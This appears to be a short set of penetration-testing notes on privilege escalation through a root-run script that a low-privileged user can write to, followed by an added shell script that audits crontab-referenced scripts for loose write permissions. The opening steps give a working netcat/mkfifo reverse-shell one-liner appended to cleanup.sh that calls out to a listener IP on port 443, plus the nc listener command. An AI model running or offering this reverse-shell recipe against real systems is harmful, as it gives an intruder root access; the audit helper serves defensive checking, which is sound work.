echo a reverse shell into a root-run executable file
If a script on the target is executed with root privileges and you can write to it, append a reverse shell to it and catch it with nc to get root
1) echo a reverse shell one-liner directly into the ....sh script (the IP and port are your listener)
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.177 443 >/tmp/f" >> cleanup.sh
2) set up a listener on port 443 and wait for the reverse shell
nc -nvlp 443
3) check the shell → # prompt (root)
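The condition that makes this work is a root-run script that a low-privileged user can write to. Added check, not part of the original notes: a POSIX sh audit that walks a system-crontab file (the /etc/crontab format with a user field, the usual way such a script gets run as root) and reports every referenced script that is group- or world-writable. It assumes GNU stat on Linux; the function names and the /etc/crontab usage are mine.

```sh
#!/bin/sh
# Added audit helper (not from the original notes): flag scripts referenced
# by system crontab entries that are writable by their group or by everyone.
# Assumes GNU coreutils stat. Usage: sh audit.sh /etc/crontab /etc/cron.d/*

# Print "path mode owner" when the path is a regular file that is
# group- or world-writable; return 1 otherwise.
check_path() {
    f=${1%%[;|&>]*}                # drop shell punctuation glued to the token
    [ -f "$f" ] || return 1
    mode=$(stat -c '%a' "$f") || return 1
    owner=$(stat -c '%U' "$f") || return 1
    other=${mode#"${mode%?}"}      # last octal digit: everyone
    rest=${mode%?}
    group=${rest#"${rest%?}"}      # second-to-last octal digit: group
    case "$group$other" in         # digits 2,3,6,7 carry the write bit
        *[2367]*) printf '%s %s %s\n' "$f" "$mode" "$owner"; return 0 ;;
    esac
    return 1
}

# Scan each active crontab line for absolute paths and check each of them.
# Returns 0 when at least one loosely writable script was found.
audit_crontab() {
    file=$1
    found=1
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|\#*) continue ;;    # skip blank lines and comments
        esac
        set -f                     # schedule fields contain '*': no globbing
        set -- $line
        set +f
        for tok in "$@"; do
            case "$tok" in
                /*) check_path "$tok" && found=0 ;;
            esac
        done
    done < "$file"
    return $found
}

for cronfile in "$@"; do
    audit_crontab "$cronfile" || echo "$cronfile: no group/world-writable scripts" >&2
done
```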